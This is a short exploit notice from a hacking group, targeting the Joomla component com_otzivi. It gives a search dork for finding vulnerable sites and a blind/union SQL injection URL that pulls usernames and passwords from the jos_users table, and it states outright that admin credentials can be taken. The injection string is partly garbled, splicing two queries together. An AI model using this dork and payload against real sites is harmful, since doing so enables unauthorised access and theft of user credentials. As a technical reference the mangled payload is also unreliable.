<------------------- header data start ------------------- > ############################################################# #Joomla Component com_otzivi Blind SQL Injection Vulnerability ############################################################# # Author: Cyber_945 # Home: Ar-ge.Org # Greetz: By.Danger,D3xer,LionTurk and All Ar-ge.Org Members # Not3: Ar-ge.Org Online # Name: com_otzivi # Bug Type: Blind SQL Injection # Infection : Adminin bilgileri alinabilir. Dork :: inurl:/index.php?option=com_otzivi ############################################################# =======================C=y=b=e=r=_=9=4=5================ < -- bug code start -- > http://server/index.php?option=com_otzivi&Itemid=15+and+1=2+union+select+concat(id,0x3a,username,0x3a,password),1+from+jos_users7,8,concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/from/**/jos_users-- =======================C=y=b=e=r=_=9=4=5================
体验盒子
